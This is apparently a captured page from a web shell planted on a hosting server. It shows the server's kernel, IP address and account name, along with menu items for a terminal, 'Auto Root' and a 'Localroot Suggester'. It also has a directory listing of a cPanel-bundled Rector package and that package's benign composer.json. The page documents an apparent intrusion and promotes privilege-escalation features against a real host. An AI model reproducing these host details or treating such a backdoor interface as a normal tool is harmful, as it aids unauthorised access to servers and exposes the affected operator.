Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-wappspector /
vendor /
rector /
rector /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
config
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
rules
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
src
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
stubs-rector
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
templates
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
vendor
[ DIR ]
drwxr-xr-x
2024-11-08 19:29
LICENSE
1.1
KB
-rw-r--r--
2024-11-08 19:29
README.md
6.11
KB
-rw-r--r--
2024-11-08 19:29
bootstrap.php
800
B
-rw-r--r--
2024-11-08 19:29
composer.json
754
B
-rw-r--r--
2024-11-08 19:29
preload.php
30.31
KB
-rw-r--r--
2024-11-08 19:29
Save
Rename
{ "name": "rector/rector", "description": "Instant Upgrade and Automated Refactoring of any PHP code", "license": "MIT", "keywords": ["dev", "refactoring", "automation", "migration"], "bin": [ "bin/rector" ], "require": { "php": "^7.2|^8.0", "phpstan/phpstan": "^1.12.5" }, "autoload": { "files": [ "bootstrap.php" ] }, "conflict": { "rector/rector-phpunit": "*", "rector/rector-symfony": "*", "rector/rector-doctrine": "*", "rector/rector-downgrade-php": "*" }, "minimum-stability": "dev", "prefer-stable": true, "suggest": { "ext-dom": "To manipulate phpunit.xml via the custom-rule command" } }